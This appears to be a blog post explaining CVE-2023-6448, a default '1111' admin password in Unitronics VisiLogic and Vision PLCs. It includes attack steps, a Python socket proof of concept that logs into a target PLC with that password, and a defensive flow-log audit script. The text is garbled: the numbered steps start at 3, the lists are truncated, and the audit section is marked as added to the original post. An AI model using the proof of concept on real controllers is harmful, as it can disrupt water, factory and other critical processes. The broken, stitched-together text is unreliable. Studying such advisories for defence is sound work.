*Published: June 2024*

## Introduction

Industrial control systems (ICS) quietly run our cities—factories, water plants, and transport all depend on Programmable Logic Controllers (PLCs) and Human Machine Interfaces (HMIs). When vulnerabilities pop up, the consequences can hit hard. In late 2023, a critical flaw tagged as CVE-2023-6448 was reported in Unitronics VisiLogic software, widely used to program PLCs like Vision and Samba models.

Let’s break down what happened, how hackers exploit this bug, and how the attack looks in practice. No jargon—just the facts, some sample code, and links to more information.

## What's the Issue in CVE-2023-6448?

Unitronics VisiLogic (before version 9.9.00) uses a default, hardcoded administrative password when setting up new systems. Anyone on the same network can connect to the device and gain full control—no hacking skills, no guesswork, just “out of the box” access. No authentication, just the keys to the kingdom.

### Affected Products

- Unitronics Vision PLCs: e.g. Vision120, Vision130, Vision350, Vision560, Vision570, Vision104, Vision121

### Real-World Threat

If you have one of these PLCs/HMIs connected to your internal network or (worse) exposed to the internet, an attacker can:

- Stop or change automation processes.

Think: Turning off pumps, shutting down alarms, or changing recipe values in a factory—all from afar, instantly, and without your permission.

## Exploit in Action

The attack is easy and doesn't need much technical knowledge—just some basic networking. The default admin password (typically “1111”) can be used over TCP/IP to communicate with the device.

> 💡 *If you haven’t changed the default “1111” password on your devices, they’re likely at risk!*

3. Send login command with default admin password.

4. Gain full administrative access, allowing change/upload/download of PLC code.

### Example: Using Python to Talk to a Vulnerable Unitronics Vision PLC

Below is a simple proof-of-concept (PoC) illustrating how an attacker could connect directly to a vulnerable PLC using Python sockets. (This is FOR DEMONSTRATION ONLY—do not use illegally or irresponsibly!)

You’ll need the device’s IP address and the default admin password.

```python
import socket

IP = "192.168.1.100"     # Target PLC address
PORT = 20256             # Typical port for VisiLogic
DEFAULT_PASSWORD = b"1111"  # Default admin password

# Create socket and connect
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((IP, PORT))

# Example: Send the default admin password as part of the login protocol
# (Unitronics protocol is simple, we send the password directly for this demo)
s.sendall(DEFAULT_PASSWORD)

# Receive the response (should grant access)
response = s.recv(1024)
print("[*] Received:", response.decode())

# Further administrative commands can be sent here...

s.close()
```

> Note: The full Unitronics protocol is more involved (see Unitronics protocol documentation), but this PoC highlights how trivial the authentication is when using the default password.

- CVE-2023-6448 entry (NVD)
- CISA ICS Advisory - ICSA-23-332-09
- Unitronics Security Notice
- VisiLogic Release History & Download (Get Updates!)


## How to Defend Your PLC/HMI

Restrict Network Access.

Segment your network and limit who can connect to your PLCs/HMIs. Never expose them directly to the public internet.
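
One way to check that this segmentation is actually holding, as an added example (not part of the original post and not Unitronics tooling): it scans firewall flow records for connections to the PLC port from anything outside an engineering-workstation allowlist. The log format, the subnets, the allowlist and the severity labels are assumptions, and the sample records are constructed.

```python
import ipaddress

PLC_PORT = 20256  # port the post gives as typical for VisiLogic
# Assumptions (hypothetical site layout, not from the post):
PLC_SEGMENT = ipaddress.ip_network("10.20.10.0/24")   # where the PLCs live
ALLOWED_SRC = [ipaddress.ip_network("10.20.5.0/28")]  # engineering workstations
SITE_NET = ipaddress.ip_network("10.0.0.0/8")         # everything internal

# Constructed flow records: "timestamp src dst dst_port action"
SAMPLE_FLOWS = """\
2024-06-03T08:01:12Z 10.20.5.4 10.20.10.21 20256 ALLOW
2024-06-03T08:14:40Z 10.30.7.88 10.20.10.21 20256 ALLOW
2024-06-03T09:02:03Z 203.0.113.45 10.20.10.22 20256 ALLOW
2024-06-03T09:02:09Z 203.0.113.45 10.20.10.22 20256 DENY
2024-06-03T09:30:00Z 10.20.5.4 10.20.10.21 443 ALLOW
malformed line
"""

def audit_flows(text):
    """Flag PLC-port connections from sources outside the allowlist."""
    findings = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 5:
            continue  # skip malformed records
        ts, src, dst, port, action = parts
        try:
            src_ip = ipaddress.ip_address(src)
            dst_ip = ipaddress.ip_address(dst)
            port = int(port)
        except ValueError:
            continue  # unparseable address or port
        if port != PLC_PORT or dst_ip not in PLC_SEGMENT:
            continue
        if any(src_ip in net for net in ALLOWED_SRC):
            continue  # expected programming traffic
        if action != "ALLOW":
            severity = "info"      # blocked: the control worked, still worth a look
        elif src_ip in SITE_NET:
            severity = "high"      # internal host that should not reach the PLC
        else:
            severity = "critical"  # PLC port reachable from outside the site
        findings.append({"time": ts, "src": src, "dst": dst,
                         "action": action, "severity": severity})
    return findings

if __name__ == "__main__":
    for f in audit_flows(SAMPLE_FLOWS):
        print(f"{f['severity']:8} {f['time']} {f['src']} -> {f['dst']}:{PLC_PORT} ({f['action']})")
```

Any `high` or `critical` finding means a host that is not an approved workstation completed a connection to a PLC, which is exactly the path the default password leaves open.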

## Why It Matters

Attacks on industrial devices are no longer science fiction. Simple misconfigurations—like leaving default passwords—let attackers walk right in. When it comes to critical infrastructure, the stakes are too high for that kind of oversight.

If you use VisiLogic before 9.9.00 (or manage sites where it’s used), check your devices today.

## Summary

CVE-2023-6448 isn’t a complicated bug—it’s about careless default passwords, widespread in industrial automation. But the impact can be severe. By understanding and fixing this issue, you protect not just your gear, but the vital services that run on it.

Update, strengthen your passwords, and lock those doors!

*If you found this post helpful, consider sharing with plant managers, IT teams, or system integrators working with Unitronics products. Stay safe!*

## Timeline

Published on: 12/05/2023 18:15:12 UTC
Last modified on: 12/13/2023 17:15:07 UTC